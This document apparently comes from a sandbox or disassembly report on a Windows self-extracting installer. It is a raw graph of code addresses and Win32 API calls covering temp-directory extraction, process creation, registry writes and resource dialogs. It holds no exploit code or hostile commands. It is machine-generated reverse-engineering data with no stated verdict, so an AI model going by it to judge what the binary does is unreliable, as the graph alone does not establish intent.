39171e 2378->2488 2379->2380 2380->2374 2383 394645 MessageBoxA LocalFree 2383->2361 2384 3967c9 EnumResourceLanguagesA 2384->2383 2392 395e17 2386->2392 2410 395cc3 2386->2410 2387 396ce0 4 API calls 2389 392e2c 2387->2389 2388 395ced CharNextA 2388->2410 2389->2254 2389->2255 2390 395dec GetModuleFileNameA 2391 395e0a 2390->2391 2390->2392 2498 3966c8 2391->2498 2392->2387 2394 396218 2507 396e2a 2394->2507 2397 395dd0 2397->2390 2397->2392 2398 395e36 CharUpperA 2399 3961d0 2398->2399 2398->2410 2400 3944b9 20 API calls 2399->2400 2401 3961e7 2400->2401 2402 3961f0 CloseHandle 2401->2402 2403 3961f7 ExitProcess 2401->2403 2402->2403 2404 395f9f CharUpperA 2404->2410 2405 395f59 CompareStringA 2405->2410 2406 396003 CharUpperA 2406->2410 2407 39667f IsDBCSLeadByte CharNextA 2407->2410 2408 3960a2 CharUpperA 2408->2410 2409 395edc CharUpperA 2409->2410 2410->2388 2410->2392 2410->2394 2410->2397 2410->2398 2410->2404 2410->2405 2410->2406 2410->2407 2410->2408 2410->2409 2503 39658a 2410->2503 2413 3923b9 2412->2413 2414 3924cb 2412->2414 2413->2414 2417 3923e9 FindFirstFileA 2413->2417 2415 396ce0 4 API calls 2414->2415 2416 3924dc 2415->2416 2416->2264 2417->2414 2425 392407 2417->2425 2418 392479 2422 392488 SetFileAttributesA DeleteFileA 2418->2422 2419 392421 lstrcmpA 2420 3924a9 FindNextFileA 2419->2420 2421 392431 lstrcmpA 2419->2421 2423 3924bd FindClose RemoveDirectoryA 2420->2423 2420->2425 2421->2420 2421->2425 2422->2420 2423->2414 2424 39658a CharPrevA 2424->2425 2425->2418 2425->2419 2425->2420 2425->2424 2426 392390 5 API calls 2425->2426 2426->2425 2431 393737 2427->2431 2432 39372d 2427->2432 2428 3944b9 20 API calls 2441 3939fc 2428->2441 2429 396ce0 4 API calls 2430 392e92 2429->2430 2430->2243 2430->2264 2442 3918a3 2430->2442 2431->2432 2434 3938a4 2431->2434 2431->2441 2514 3928e8 2431->2514 2432->2428 2432->2441 2434->2432 2435 3939c1 MessageBeep 2434->2435 2434->2441 2436 39681f 10 API calls 2435->2436 2437 3939ce 2436->2437 2438 3939d8 MessageBoxA 2437->2438 2439 3967c9 EnumResourceLanguagesA 2437->2439 2438->2441 2439->2438 2441->2429 2443 3919b8 2442->2443 2444 3918d5 2442->2444 2445 396ce0 4 API calls 2443->2445 2543 3917ee LoadLibraryA 2444->2543 2447 3919d5 2445->2447 2447->2264 2462 396517 FindResourceA 2447->2462 2449 3918e5 GetCurrentProcess OpenProcessToken 2449->2443 2450 391900 GetTokenInformation 2449->2450 2451 391918 GetLastError 2450->2451 2452 3919aa CloseHandle 2450->2452 2451->2452 2453 391927 LocalAlloc 2451->2453 2452->2443 2454 3919a9 2453->2454 2455 391938 GetTokenInformation 2453->2455 2454->2452 2456 39194e AllocateAndInitializeSid 2455->2456 2457 3919a2 LocalFree 2455->2457 2456->2457 2461 39196e 2456->2461 2457->2454 2458 391999 FreeSid 2458->2457 2459 391975 EqualSid 2460 39198c 2459->2460 2459->2461 2460->2458 2461->2458 2461->2459 2461->2460 2463 39656b 2462->2463 2464 396536 LoadResource 2462->2464 2466 3944b9 20 API calls 2463->2466 2464->2463 2465 396544 DialogBoxIndirectParamA FreeResource 2464->2465 2465->2463 2467 39657c 2465->2467 2466->2467 2467->2264 2469->2356 2471 396940 2470->2471 2472 396857 GetVersionExA 2470->2472 2473 396ce0 4 API calls 2471->2473 2474 39691a 2472->2474 2475 39687c 2472->2475 2476 39463b 2473->2476 2474->2471 2475->2474 2477 3968a5 GetSystemMetrics 2475->2477 2476->2383 2476->2384 2477->2474 2478 3968b5 RegOpenKeyExA 2477->2478 2478->2474 2479 3968d6 RegQueryValueExA RegCloseKey 2478->2479 2479->2474 2480 39690c 2479->2480 2492 3966f9 2480->2492 2483 3967e2 2482->2483 2487 396803 2482->2487 2496 396793 EnumResourceLanguagesA 2483->2496 2485 3967f5 2485->2487 2497 396793 EnumResourceLanguagesA 2485->2497 2487->2367 2489 39172d 2488->2489 2490 39173d _vsnprintf 2489->2490 2491 39175d 2489->2491 2490->2491 2491->2380 2493 39670f 2492->2493 2494 396740 CharNextA 2493->2494 2495 39674b 2493->2495 2494->2493 2495->2474 2496->2485 2497->2487 2499 3966d5 2498->2499 2500 3966f3 2499->2500 2502 3966e5 CharNextA 2499->2502 2510 396648 2499->2510 2500->2392 2502->2499 2504 39659b 2503->2504 2504->2504 2505 3965b8 CharPrevA 2504->2505 2506 3965ab 2504->2506 2505->2506 2506->2410 2513 396cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2507->2513 2509 39621d 2511 39665d IsDBCSLeadByte 2510->2511 2512 396668 2510->2512 2511->2512 2512->2499 2513->2509 2515 392a62 2514->2515 2519 39290d 2514->2519 2516 392a6e GlobalFree 2515->2516 2517 392a75 2515->2517 2516->2517 2517->2434 2519->2515 2520 392955 GlobalAlloc 2519->2520 2522 392a20 GlobalUnlock 2519->2522 2523 392a80 GlobalUnlock 2519->2523 2524 392773 2519->2524 2520->2515 2521 392968 GlobalLock 2520->2521 2521->2515 2521->2519 2522->2519 2523->2515 2525 3927a3 CharUpperA CharNextA CharNextA 2524->2525 2526 3928b2 2524->2526 2527 3927db 2525->2527 2528 3928b7 GetSystemDirectoryA 2525->2528 2526->2528 2529 3928a8 GetWindowsDirectoryA 2527->2529 2530 3927e3 2527->2530 2531 3928bf 2528->2531 2529->2531 2535 39658a CharPrevA 2530->2535 2532 3928d2 2531->2532 2533 39658a CharPrevA 2531->2533 2534 396ce0 4 API calls 2532->2534 2533->2532 2536 3928e2 2534->2536 2537 392810 RegOpenKeyExA 2535->2537 2536->2519 2537->2531 2538 392837 RegQueryValueExA 2537->2538 2539 39289a RegCloseKey 2538->2539 2540 39285c 2538->2540 2539->2531 2541 392867 ExpandEnvironmentStringsA 2540->2541 2542 39287a 2540->2542 2541->2542 2542->2539 2544 391890 2543->2544 2545 391826 GetProcAddress 2543->2545 2548 396ce0 4 API calls 2544->2548 2546 391889 FreeLibrary 2545->2546 2547 391839 AllocateAndInitializeSid 2545->2547 2546->2544 2547->2546 2550 39185f FreeSid 2547->2550 2549 39189f 2548->2549 2549->2443 2549->2449 2550->2546 2553 39468f 7 API calls 2552->2553 2554 3951f9 LocalAlloc 2553->2554 2555 39522d 2554->2555 2556 39520d 2554->2556 2557 39468f 7 API calls 2555->2557 2558 3944b9 20 API calls 2556->2558 2559 39523a 2557->2559 2560 39521e 2558->2560 2561 39523e 2559->2561 2562 395262 lstrcmpA 2559->2562 2563 396285 GetLastError 2560->2563 2564 3944b9 20 API calls 2561->2564 2565 39527e 2562->2565 2566 395272 LocalFree 2562->2566 2570 392f4d 2563->2570 2567 39524f LocalFree 2564->2567 2568 3944b9 20 API calls 2565->2568 2566->2570 2567->2570 2569 395290 LocalFree 2568->2569 2569->2570 2570->2278 2570->2281 2570->2313 2572 39468f 7 API calls 2571->2572 2573 395175 2572->2573 2574 39517a 2573->2574 2575 3951af 2573->2575 2576 3944b9 20 API calls 2574->2576 2577 39468f 7 API calls 2575->2577 2578 39518d 2576->2578 2579 3951c0 2577->2579 2578->2284 2733 396298 2579->2733 2582 3951e1 2582->2284 2583 3944b9 20 API calls 2583->2578 2585 39468f 7 API calls 2584->2585 2586 3955c7 LocalAlloc 2585->2586 2587 3955db 2586->2587 2588 3955fd 2586->2588 2589 3944b9 20 API calls 2587->2589 2590 39468f 7 API calls 2588->2590 2591 3955ec 2589->2591 2592 39560a 2590->2592 2593 396285 GetLastError 2591->2593 2594 39560e 2592->2594 2595 395632 lstrcmpA 2592->2595 2607 3955f1 2593->2607 2596 3944b9 20 API calls 2594->2596 2597 39564b LocalFree 2595->2597 2598 395645 2595->2598 2601 39561f LocalFree 2596->2601 2599 39565b 2597->2599 2600 395696 2597->2600 2598->2597 2606 395467 49 API calls 2599->2606 2602 39589f 2600->2602 2605 3956ae GetTempPathA 2600->2605 2601->2607 2603 396517 24 API calls 2602->2603 2603->2607 2604 396ce0 4 API calls 2608 392f7e 2604->2608 2609 3956c3 2605->2609 2612 3956eb 2605->2612 2610 395678 2606->2610 2607->2604 2608->2291 2608->2313 2745 395467 2609->2745 2610->2607 2613 3944b9 20 API calls 2610->2613 2612->2607 2614 39586c GetWindowsDirectoryA 2612->2614 2615 395717 GetDriveTypeA 2612->2615 2613->2607 2779 39597d GetCurrentDirectoryA SetCurrentDirectoryA 2614->2779 2619 395730 GetFileAttributesA 2615->2619 2630 39572b 2615->2630 2619->2630 2621 395467 49 API calls 2621->2612 2622 392630 21 API calls 2622->2630 2624 3957c1 GetWindowsDirectoryA 2624->2630 2625 39658a CharPrevA 2627 3957e8 GetFileAttributesA 2625->2627 2626 39597d 34 API calls 2626->2630 2628 3957fa CreateDirectoryA 2627->2628 2627->2630 2628->2630 2629 395827 SetFileAttributesA 2629->2630 2630->2607 2630->2614 2630->2615 2630->2619 2630->2622 2630->2624 2630->2625 2630->2626 2630->2629 2631 395467 49 API calls 2630->2631 2775 396952 2630->2775 2631->2630 2633 396249 2632->2633 2634 396268 2632->2634 2635 3944b9 20 API calls 2633->2635 2636 39597d 34 API calls 2634->2636 2637 39625a 2635->2637 2638 39625f 2636->2638 2639 396285 GetLastError 2637->2639 2640 396ce0 4 API calls 2638->2640 2639->2638 2641 393013 2640->2641 2641->2297 2641->2313 2643 393b2d 2642->2643 2643->2643 2644 393b72 2643->2644 2645 393b53 2643->2645 2845 394fe0 2644->2845 2647 396517 24 API calls 2645->2647 2648 393b70 2647->2648 2649 396298 10 API calls 2648->2649 2650 393b7b 2648->2650 2649->2650 2650->2302 2652 392583 2651->2652 2653 392622 2651->2653 2654 3925e8 RegOpenKeyExA 2652->2654 2655 39258b 2652->2655 2896 3924e0 GetWindowsDirectoryA 2653->2896 2657 392609 RegQueryInfoKeyA 2654->2657 2658 3925e3 2654->2658 2655->2658 2659 39259b RegOpenKeyExA 2655->2659 2660 3925d1 RegCloseKey 2657->2660 2658->2310 2659->2658 2661 3925bc RegQueryValueExA 2659->2661 2660->2658 2661->2660 2663 393bdb 2662->2663 2670 393bec 2662->2670 2664 39468f 7 API calls 2663->2664 2664->2670 2665 393c03 memset 2665->2670 2666 393d13 2667 3944b9 20 API calls 2666->2667 2674 393d26 2667->2674 2669 39468f 7 API calls 2669->2670 2670->2665 2670->2666 2670->2669 2672 393d7b CompareStringA 2670->2672 2670->2674 2676 393fab 2670->2676 2679 393f1e LocalFree 2670->2679 2680 393f46 LocalFree 2670->2680 2683 393fd7 2670->2683 2685 393cc7 CompareStringA 2670->2685 2696 393e10 2670->2696 2904 391ae8 2670->2904 2945 39202a memset memset RegCreateKeyExA 2670->2945 2971 393fef 2670->2971 2671 396ce0 4 API calls 2673 393f60 2671->2673 2672->2670 2672->2683 2673->2311 2674->2671 2678 3944b9 20 API calls 2676->2678 2682 393fbe LocalFree 2678->2682 2679->2670 2679->2683 2680->2674 2682->2674 2683->2674 2995 392267 2683->2995 2685->2670 2686 393e1f GetProcAddress 2688 393f64 2686->2688 2686->2696 2687 393f92 2689 3944b9 20 API calls 2687->2689 2690 3944b9 20 API calls 2688->2690 2691 393fa9 2689->2691 2692 393f75 FreeLibrary 2690->2692 2693 393f7c LocalFree 2691->2693 2692->2693 2694 396285 GetLastError 2693->2694 2695 393f8b 2694->2695 2695->2674 2696->2686 2696->2687 2697 393eff FreeLibrary 2696->2697 2698 393f40 FreeLibrary 2696->2698 2985 396495 2696->2985 2697->2679 2698->2680 2700 39468f 7 API calls 2699->2700 2701 393a55 LocalAlloc 2700->2701 2702 393a6c 2701->2702 2703 393a8e 2701->2703 2704 3944b9 20 API calls 2702->2704 2705 39468f 7 API calls 2703->2705 2706 393a7d 2704->2706 2707 393a98 2705->2707 2708 396285 GetLastError 2706->2708 2709 393a9c 2707->2709 2710 393ac5 lstrcmpA 2707->2710 2711 392f64 2708->2711 2712 3944b9 20 API calls 2709->2712 2713 393ada 2710->2713 2714 393b0d LocalFree 2710->2714 2711->2278 2711->2313 2716 393aad LocalFree 2712->2716 2715 396517 24 API calls 2713->2715 2714->2711 2717 393aec LocalFree 2715->2717 2716->2711 2717->2711 2719 39628f 2718->2719 2719->2313 2721 39468f 7 API calls 2720->2721 2722 39417d LocalAlloc 2721->2722 2723 3941a8 2722->2723 2724 394195 2722->2724 2726 39468f 7 API calls 2723->2726 2725 3944b9 20 API calls 2724->2725 2727 3941a6 2725->2727 2728 3941b5 2726->2728 2727->2313 2729 3941b9 2728->2729 2730 3941c5 lstrcmpA 2728->2730 2732 3944b9 20 API calls 2729->2732 2730->2729 2731 3941e6 LocalFree 2730->2731 2731->2727 2732->2731 2734 39171e _vsnprintf 2733->2734 2735 3962c9 FindResourceA 2734->2735 2737 3962cb LoadResource LockResource 2735->2737 2738 396353 2735->2738 2737->2738 2741 3962e0 2737->2741 2739 396ce0 4 API calls 2738->2739 2740 3951ca 2739->2740 2740->2582 2740->2583 2742 39631b FreeResource 2741->2742 2743 396355 FreeResource 2741->2743 2744 39171e _vsnprintf 2742->2744 2743->2738 2744->2735 2746 39548a 2745->2746 2764 39551a 2745->2764 2805 3953a1 2746->2805 2748 395581 2752 396ce0 4 API calls 2748->2752 2751 395495 2751->2748 2755 39550c 2751->2755 2756 3954c2 GetSystemInfo 2751->2756 2757 39559a 2752->2757 2753 39553b CreateDirectoryA 2758 395577 2753->2758 2759 395547 2753->2759 2754 39554d 2754->2748 2760 39597d 34 API calls 2754->2760 2761 39658a CharPrevA 2755->2761 2768 3954da 2756->2768 2757->2607 2769 392630 GetWindowsDirectoryA 2757->2769 2762 396285 GetLastError 2758->2762 2759->2754 2763 39555c 2760->2763 2761->2764 2765 39557c 2762->2765 2763->2748 2767 395568 RemoveDirectoryA 2763->2767 2816 3958c8 2764->2816 2765->2748 2766 39658a CharPrevA 2766->2755 2767->2748 2768->2755 2768->2766 2770 39266f 2769->2770 2771 39265e 2769->2771 2773 396ce0 4 API calls 2770->2773 2772 3944b9 20 API calls 2771->2772 2772->2770 2774 392687 2773->2774 2774->2612 2774->2621 2776 39696e GetDiskFreeSpaceA 2775->2776 2777 3969a1 2775->2777 2776->2777 2778 396989 MulDiv 2776->2778 2777->2630 2778->2777 2780 3959bb 2779->2780 2781 3959dd GetDiskFreeSpaceA 2779->2781 2784 3944b9 20 API calls 2780->2784 2782 395ba1 memset 2781->2782 2783 395a21 MulDiv 2781->2783 2786 396285 GetLastError 2782->2786 2783->2782 2787 395a50 GetVolumeInformationA 2783->2787 2785 3959cc 2784->2785 2788 396285 GetLastError 2785->2788 2789 395bbc GetLastError FormatMessageA 2786->2789 2790 395a6e memset 2787->2790 2791 395ab5 SetCurrentDirectoryA 2787->2791 2792 3959d1 2788->2792 2793 395be3 2789->2793 2794 396285 GetLastError 2790->2794 2795 395acc 2791->2795 2799 396ce0 4 API calls 2792->2799 2796 3944b9 20 API calls 2793->2796 2797 395a89 GetLastError FormatMessageA 2794->2797 2801 395b0a 2795->2801 2803 395b20 2795->2803 2798 395bf5 SetCurrentDirectoryA 2796->2798 2797->2793 2798->2792 2800 395c11 2799->2800 2800->2612 2802 3944b9 20 API calls 2801->2802 2802->2792 2803->2792 2828 39268b 2803->2828 2807 3953bf 2805->2807 2806 39171e _vsnprintf 2806->2807 2807->2806 2808 39658a CharPrevA 2807->2808 2811 395415 GetTempFileNameA 2807->2811 2809 3953fa RemoveDirectoryA GetFileAttributesA 2808->2809 2809->2807 2810 39544f CreateDirectoryA 2809->2810 2810->2811 2812 39543a 2810->2812 2811->2812 2813 395429 DeleteFileA CreateDirectoryA 2811->2813 2814 396ce0 4 API calls 2812->2814 2813->2812 2815 395449 2814->2815 2815->2751 2817 3958d8 2816->2817 2817->2817 2818 3958df LocalAlloc 2817->2818 2819 395919 2818->2819 2820 3958f3 2818->2820 2822 39658a CharPrevA 2819->2822 2821 3944b9 20 API calls 2820->2821 2826 395906 2821->2826 2824 395931 CreateFileA LocalFree 2822->2824 2823 396285 GetLastError 2827 395534 2823->2827 2825 39595b CloseHandle GetFileAttributesA 2824->2825 2824->2826 2825->2826 2826->2823 2826->2827 2827->2753 2827->2754 2829 3926b9 2828->2829 2830 3926e5 2828->2830 2833 39171e _vsnprintf 2829->2833 2831 3926ea 2830->2831 2832 39271f 2830->2832 2834 39171e _vsnprintf 2831->2834 2835 3926e3 2832->2835 2840 39171e _vsnprintf 2832->2840 2836 3926cc 2833->2836 2839 3926fd 2834->2839 2837 396ce0 4 API calls 2835->2837 2838 3944b9 20 API calls 2836->2838 2841 39276d 2837->2841 2838->2835 2842 3944b9 20 API calls 2839->2842 2843 392735 2840->2843 2841->2792 2842->2835 2844 3944b9 20 API calls 2843->2844 2844->2835 2846 39468f 7 API calls 2845->2846 2847 394ff5 FindResourceA LoadResource LockResource 2846->2847 2848 395020 2847->2848 2860 39515f 2847->2860 2849 395029 GetDlgItem ShowWindow GetDlgItem ShowWindow 2848->2849 2850 395057 2848->2850 2849->2850 2864 394efd 2850->2864 2853 395060 2854 3944b9 20 API calls 2853->2854 2855 395075 2854->2855 2857 39511d 2855->2857 2858 395110 FreeResource 2855->2858 2856 3944b9 20 API calls 2856->2855 2859 39513a 2857->2859 2861 3944b9 20 API calls 2857->2861 2858->2857 2859->2860 2862 39514c SendMessageA 2859->2862 2860->2648 2861->2859 2862->2860 2863 39507c 2863->2855 2863->2856 2865 394f4a 2864->2865 2871 394fa1 2865->2871 2872 394980 2865->2872 2867 396ce0 4 API calls 2869 394fc6 2867->2869 2869->2853 2869->2863 2871->2867 2873 394990 2872->2873 2874 3949c2 lstrcmpA 2873->2874 2875 3949a5 2873->2875 2877 394a0e 2874->2877 2878 3949ba 2874->2878 2876 3944b9 20 API calls 2875->2876 2876->2878 2877->2878 2883 39487a 2877->2883 2878->2871 2880 394b60 2878->2880 2881 394b92 FindCloseChangeNotification 2880->2881 2882 394b76 2880->2882 2881->2882 2882->2871 2884 3948a2 CreateFileA 2883->2884 2886 3948e9 2884->2886 2887 394908 2884->2887 2886->2887 2888 3948ee 2886->2888 2887->2878 2891 39490c 2888->2891 2892 3948f5 CreateFileA 2891->2892 2894 394917 2891->2894 2892->2887 2893 394962 CharNextA 2893->2894 2894->2892 2894->2893 2895 394953 CreateDirectoryA 2894->2895 2895->2893 2897 39255b 2896->2897 2898 392510 2896->2898 2900 396ce0 4 API calls 2897->2900 2899 39658a CharPrevA 2898->2899 2901 392522 WritePrivateProfileStringA _lopen 2899->2901 2902 392569 2900->2902 2901->2897 2903 392548 _llseek _lclose 2901->2903 2902->2658 2903->2897 2905 391b25 2904->2905 3009 391a84 2905->3009 2907 391b57 2908 39658a CharPrevA 2907->2908 2910 391b8c 2907->2910 2908->2910 2909 3966c8 2 API calls 2911 391bd1 2909->2911 2910->2909 2912 391bd9 CompareStringA 2911->2912 2913 391d73 2911->2913 2912->2913 2914 391bf7 GetFileAttributesA 2912->2914 2915 3966c8 2 API calls 2913->2915 2916 391c0d 2914->2916 2917 391d53 2914->2917 2918 391d7d 2915->2918 2916->2917 2924 391a84 2 API calls 2916->2924 2919 391d64 2917->2919 2920 391df8 LocalAlloc 2918->2920 2921 391d81 CompareStringA 2918->2921 2922 3944b9 20 API calls 2919->2922 2920->2919 2923 391e0b GetFileAttributesA 2920->2923 2921->2920 2928 391d9b 2921->2928 2925 391d6c 2922->2925 2936 391e1d 2923->2936 2943 391e45 2923->2943 2926 391c31 2924->2926 2930 396ce0 4 API calls 2925->2930 2927 391c50 LocalAlloc 2926->2927 2932 391a84 2 API calls 2926->2932 2927->2919 2929 391c67 GetPrivateProfileIntA GetPrivateProfileStringA 2927->2929 2928->2928 2931 391dbe LocalAlloc 2928->2931 2938 391cf8 2929->2938 2942 391cc2 2929->2942 2935 391ea1 2930->2935 2931->2919 2937 391de1 2931->2937 2932->2927 2935->2670 2936->2943 2939 39171e _vsnprintf 2937->2939 2940 391d09 GetShortPathNameA 2938->2940 2941 391d23 2938->2941 2939->2942 2940->2941 2944 39171e _vsnprintf 2941->2944 2942->2925 3015 392aac 2943->3015 2944->2942 2946 39209a 2945->2946 2947 392256 2945->2947 2949 39171e _vsnprintf 2946->2949 2952 3920dc 2946->2952 2948 396ce0 4 API calls 2947->2948 2950 392263 2948->2950 2951 3920af RegQueryValueExA 2949->2951 2950->2670 2951->2946 2951->2952 2953 3920fb GetSystemDirectoryA 2952->2953 2954 3920e4 RegCloseKey 2952->2954 2955 39658a CharPrevA 2953->2955 2954->2947 2956 39211b LoadLibraryA 2955->2956 2957 392179 GetModuleFileNameA 2956->2957 2958 39212e GetProcAddress FreeLibrary 2956->2958 2959 3921de RegCloseKey 2957->2959 2963 392177 2957->2963 2958->2957 2960 39214e GetSystemDirectoryA 2958->2960 2959->2947 2961 392165 2960->2961 2960->2963 2962 39658a CharPrevA 2961->2962 2962->2963 2963->2963 2964 3921b7 LocalAlloc 2963->2964 2965 3921cd 2964->2965 2966 3921ec 2964->2966 2967 3944b9 20 API calls 2965->2967 2968 39171e _vsnprintf 2966->2968 2967->2959 2969 392218 RegSetValueExA RegCloseKey LocalFree 2968->2969 2969->2947 2972 394106 2971->2972 2973 394016 CreateProcessA 2971->2973 2976 396ce0 4 API calls 2972->2976 2974 394041 WaitForSingleObject GetExitCodeProcess 2973->2974 2975 3940c4 2973->2975 2978 394070 2974->2978 2977 396285 GetLastError 2975->2977 2979 394117 2976->2979 2981 3940c9 GetLastError FormatMessageA 2977->2981 3042 39411b 2978->3042 2979->2670 2983 3944b9 20 API calls 2981->2983 2982 394096 CloseHandle CloseHandle 2982->2972 2984 3940ba 2982->2984 2983->2972 2984->2972 2986 3964c2 2985->2986 2987 39658a CharPrevA 2986->2987 2988 3964d8 GetFileAttributesA 2987->2988 2989 3964ea 2988->2989 2990 396501 LoadLibraryA 2988->2990 2989->2990 2992 3964ee LoadLibraryExA 2989->2992 2991 396508 2990->2991 2993 396ce0 4 API calls 2991->2993 2992->2991 2994 396513 2993->2994 2994->2696 2996 392289 RegOpenKeyExA 2995->2996 2997 392381 2995->2997 2996->2997 2999 3922b1 RegQueryValueExA 2996->2999 2998 396ce0 4 API calls 2997->2998 3000 39238c 2998->3000 3001 392374 RegCloseKey 2999->3001 3002 3922e6 memset GetSystemDirectoryA 2999->3002 3000->2674 3001->2997 3003 39230f 3002->3003 3004 392321 3002->3004 3005 39658a CharPrevA 3003->3005 3006 39171e _vsnprintf 3004->3006 3005->3004 3007 39233f RegSetValueExA 3006->3007 3007->3001 3010 391a9a 3009->3010 3012 391aba 3010->3012 3014 391aaf 3010->3014 3028 39667f 3010->3028 3012->2907 3013 39667f 2 API calls 3013->3014 3014->3012 3014->3013 3016 392be6 3015->3016 3017 392ad4 GetModuleFileNameA 3015->3017 3018 396ce0 4 API calls 3016->3018 3027 392b02 3017->3027 3020 392bf5 3018->3020 3019 392af1 IsDBCSLeadByte 3019->3027 3020->2925 3021 392bca CharNextA 3023 392bd3 CharNextA 3021->3023 3022 392b11 CharNextA CharUpperA 3024 392b8d CharUpperA 3022->3024 3022->3027 3023->3027 3024->3027 3026 392b43 CharPrevA 3026->3027 3027->3016 3027->3019 3027->3021 3027->3022 3027->3023 3027->3026 3033 3965e8 3027->3033 3029 396689 3028->3029 3030 3966a5 3029->3030 3031 396648 IsDBCSLeadByte 3029->3031 3032 396697 CharNextA 3029->3032 3030->3010 3031->3029 3032->3029 3034 3965f4 3033->3034 3034->3034 3035 3965fb CharPrevA 3034->3035 3036 396611 CharPrevA 3035->3036 3037 39660b 3036->3037 3038 39661e 3036->3038 3037->3036 3037->3038 3039 39663d 3038->3039 3040 396634 CharNextA 3038->3040 3041 396627 CharPrevA 3038->3041 3039->3027 3040->3039 3041->3039 3041->3040 3043 394132 3042->3043 3045 39412a 3042->3045 3046 391ea7 3043->3046 3045->2982 3047 391eba 3046->3047 3049 391ed3 3046->3049 3048 39256d 15 API calls 3047->3048 3048->3049 3049->3045 3051 391ff0 RegOpenKeyExA 3050->3051 3052 392026 3050->3052 3051->3052 3053 39200f RegDeleteValueA RegCloseKey 3051->3053 3052->2320 3053->3052 3164 396a20 __getmainargs 3165 3919e0 3166 391a03 3165->3166 3167 391a24 GetDesktopWindow 3165->3167 3169 391a16 EndDialog 3166->3169 3171 391a20 3166->3171 3168 3943d0 11 API calls 3167->3168 3170 391a33 LoadStringA SetDlgItemTextA MessageBeep 3168->3170 3169->3171 3170->3171 3172 396ce0 4 API calls 3171->3172 3173 391a7e 3172->3173 3054 394ad0 3062 393680 3054->3062 3057 394ae9 3058 394aee WriteFile 3059 394b0f 3058->3059 3060 394b14 3058->3060 3060->3059 3061 394b3b SendDlgItemMessageA 3060->3061 3061->3059 3063 393691 MsgWaitForMultipleObjects 3062->3063 3064 3936a9 PeekMessageA 3063->3064 3065 3936e8 3063->3065 3064->3063 3066 3936bc 3064->3066 3065->3057 3065->3058 3066->3063 3066->3065 3067 3936c7 DispatchMessageA 3066->3067 3068 3936d1 PeekMessageA 3066->3068 3067->3068 3068->3066 3069 394cd0 3070 394d0b 3069->3070 3071 394cf4 3069->3071 3072 394d02 3070->3072 3075 394dcb 3070->3075 3078 394d25 3070->3078 3071->3072 3073 394b60 FindCloseChangeNotification 3071->3073 3074 396ce0 4 API calls 3072->3074 3073->3072 3076 394e95 3074->3076 3077 394dd4 SetDlgItemTextA 3075->3077 3079 394de3 3075->3079 3077->3079 3078->3072 3092 394c37 3078->3092 3079->3072 3097 39476d 3079->3097 3083 394e38 3083->3072 3085 394980 25 API calls 3083->3085 3084 394b60 FindCloseChangeNotification 3086 394d99 SetFileAttributesA 3084->3086 3087 394e56 3085->3087 3086->3072 3087->3072 3088 394e64 3087->3088 3106 3947e0 LocalAlloc 3088->3106 3091 394e6f 3091->3072 3093 394c88 3092->3093 3094 394c4c DosDateTimeToFileTime 3092->3094 3093->3072 3093->3084 3094->3093 3095 394c5e LocalFileTimeToFileTime 3094->3095 3095->3093 3096 394c70 SetFileTime 3095->3096 3096->3093 3115 3966ae GetFileAttributesA 3097->3115 3099 39477b 3099->3083 3100 3947cc SetFileAttributesA 3102 3947db 3100->3102 3102->3083 3103 396517 24 API calls 3104 3947b1 3103->3104 3104->3100 3104->3102 3105 3947c2 3104->3105 3105->3100 3107 39480f LocalAlloc 3106->3107 3108 3947f6 3106->3108 3110 39480b 3107->3110 3112 394831 3107->3112 3109 3944b9 20 API calls 3108->3109 3109->3110 3110->3091 3113 3944b9 20 API calls 3112->3113 3114 394846 LocalFree 3113->3114 3114->3110 3116 394777 3115->3116 3116->3099 3116->3100 3116->3103 3174 393210 3175 393227 3174->3175 3200 39328e EndDialog 3174->3200 3176 3933e2 GetDesktopWindow 3175->3176 3179 393235 3175->3179 3178 3943d0 11 API calls 3176->3178 3180 3933f1 SetWindowTextA SendDlgItemMessageA 3178->3180 3181 3932dd GetDlgItemTextA 3179->3181 3182 39324c 3179->3182 3191 393239 3179->3191 3183 39341f GetDlgItem EnableWindow 3180->3183 3180->3191 3184 393366 3181->3184 3192 3932fc 3181->3192 3185 393251 3182->3185 3186 3932c5 EndDialog 3182->3186 3183->3191 3188 3944b9 20 API calls 3184->3188 3187 39325c LoadStringA 3185->3187 3185->3191 3186->3191 3189 39327b 3187->3189 3190 393294 3187->3190 3188->3191 3195 3944b9 20 API calls 3189->3195 3212 394224 LoadLibraryA 3190->3212 3192->3184 3194 393331 GetFileAttributesA 3192->3194 3198 39337c 3194->3198 3199 39333f 3194->3199 3195->3200 3197 3932a5 SetDlgItemTextA 3197->3189 3197->3191 3201 39658a CharPrevA 3198->3201 3202 3944b9 20 API calls 3199->3202 3200->3191 3203 39338d 3201->3203 3204 393351 3202->3204 3205 3958c8 27 API calls 3203->3205 3204->3191 3206 39335a CreateDirectoryA 3204->3206 3207 393394 3205->3207 3206->3184 3206->3198 3207->3184 3208 3933a4 3207->3208 3209 3933c7 EndDialog 3208->3209 3210 39597d 34 API calls 3208->3210 3209->3191 3211 3933c3 3210->3211 3211->3191 3211->3209 3213 3943b2 3212->3213 3214 394246 GetProcAddress 3212->3214 3218 3944b9 20 API calls 3213->3218 3215 39425d GetProcAddress 3214->3215 3216 3943a4 FreeLibrary 3214->3216 3215->3216 3217 394274 GetProcAddress 3215->3217 3216->3213 3217->3216 3220 39428b 3217->3220 3219 39329d 3218->3219 3219->3191 3219->3197 3221 394295 GetTempPathA 3220->3221 3226 3942e1 3220->3226 3222 3942ad 3221->3222 3222->3222 3223 3942b4 CharPrevA 3222->3223 3224 3942d0 CharPrevA 3223->3224 3223->3226 3224->3226 3225 394390 FreeLibrary 3225->3219 3226->3225 3227 394a50 3228 394a9f ReadFile 3227->3228 3229 394a66 3227->3229 3230 394abb 3228->3230 3229->3230 3231 394a82 memcpy 3229->3231 3231->3230 3232 393450 3233 39345e 3232->3233 3234 3934d3 EndDialog 3232->3234 3236 39349a GetDesktopWindow 3233->3236 3240 393465 3233->3240 3235 39346a 3234->3235 3237 3943d0 11 API calls 3236->3237 3238 3934ac SetWindowTextA SetDlgItemTextA SetForegroundWindow 3237->3238 3238->3235 3239 39348c EndDialog 3239->3235 3240->3235 3240->3239 3117 396f40 SetUnhandledExceptionFilter 3118 394cc0 GlobalFree 3241 394200 3242 39420b SendMessageA 3241->3242 3243 39421e 3241->3243 3242->3243 3244 393100 3245 393111 3244->3245 3246 3931b0 3244->3246 3250 393149 GetDesktopWindow 3245->3250 3253 39311d 3245->3253 3247 3931b9 SendDlgItemMessageA 3246->3247 3248 393141 3246->3248 3247->3248 3249 393138 EndDialog 3249->3248 3251 3943d0 11 API calls 3250->3251 3252 39315d 6 API calls 